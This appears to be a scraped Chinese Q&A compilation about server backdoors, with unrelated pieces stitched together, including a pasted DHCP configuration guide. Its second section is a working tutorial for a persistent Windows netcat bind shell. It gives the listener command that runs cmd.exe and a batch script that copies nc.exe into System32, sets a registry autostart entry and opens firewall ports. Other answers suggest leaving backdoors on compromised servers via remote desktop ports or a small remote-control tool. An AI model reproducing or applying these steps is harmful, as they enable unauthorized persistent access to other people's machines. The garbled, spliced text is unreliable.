Ⅰ 服务器里有后门程序怎么办
最简单的办法是打补丁 就是先把能堵的漏洞给堵了
然后找到后门的程序,如果不是必须运行程序的话,最好删除
要是必须运行程序的话,建议用软件屏蔽,或者隔离
Ⅱ 如何在Windows,Linux中安装后门
0×00 准备工作
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
Ⅲ centos5.5版本的服务器系统后门怎么找出来
一、安装配置dhcp [root@localhost ~]# yum -y install dhcp [root@localhost ~]# cd /usr/share/doc/dhcp-4"; DNS服务器域名 option domain-name-servers 192.168.1.24; DNS服务器的IP地址 default-lease-time 360000; 默认租约时间 max-lease-time 720000; 最大租约时间 ddns-update-style none; log-facility local7; subnet 192.168.1.0 netmask 255.255.255.0 { 分配的网段192.168.1.0/24 range 192.168.1.100 192.168.1.230; 分配的ip地址区间; option routers 192.168.1.1; 网关ip; option broadcast-address 192.168.1.255; 广播地址; } host boss { boss为主机名,随便取; hardware ethernet 00:0C:29:6C:A6:F8; 主机网卡的mac地址; fixed-address 192.168.1.10; 给其分配的ip; } [root@localhost ~]# /etc/init.d/dhcpd restart 关闭 dhcpd: [确定] 正在启动 dhcpd: [确定] 三、查看端口监听状态 [root@localhost ~]# netstat -ltunp grep dhcpd udp 0 0 0.0.0.0:67 0.0.0.0:* 5346/dhcpd Linux系统下构建DHCP服务器 /Linux/2013-06/86531.htm CentOS下配置主从DNS服务器以及DHCP下的DDNS/Linux/2013-06/85634.htm SUSELinux 11 pxe+DHCP+tftp+ftp 无人值守安装/Linux/2013-06/85481.htm Linux下架设DHCP服务器过程及3种测试 /Linux/2013-05/84832.htm Linux上一步一步实现DHCP服务器 /Linux/2013-04/82244.htm CentOS 6.5系统下构建DHCP服务器 /Linux/2014-06/103203.htm
Ⅳ 我拿了一个服务器,上面的网站我想留下个后门,怎么弄,能不能详细点,再iis如何让修改她的网站内容
首先你不要存在侥幸心理,因为你迟早会被抓的。
既然已经拿下了服务器,利用上传工具不就可以上传后门了吗? 如果你懂网页制作,相信也就会修改网页了。
你这种行为是所有网络管理员的公敌。
强烈...
Ⅳ 怎么给电脑(服务器)留后门
好多后门呀、、真的很多、、一时间都想不起来。。
最简单的开个3389或4899
我记得有一个TMD远控。
反正我这上面显示的是TMD
是不是我不知道、、
这个远控的特点是..
服务端1K、、
留作后门的好帮手啊!
Ⅵ 远程登陆 怎样在服务器上开后门或者种植木马(有的话发给我),重分请教方法发到我邮箱[email protected]
你完全可以对登陆用户进行权限设置,限制用户的操作行为啊。
木马、后门程序自己私底下玩玩可以,用到工作中可是违法的。
Ⅶ iis是什么 怎么在iis服务器留下永远的后门
IIS是服务组件,如果你想做一个网站服务器,你安装了 服务操作系统 要想把网站发布出去 必须要这个组件!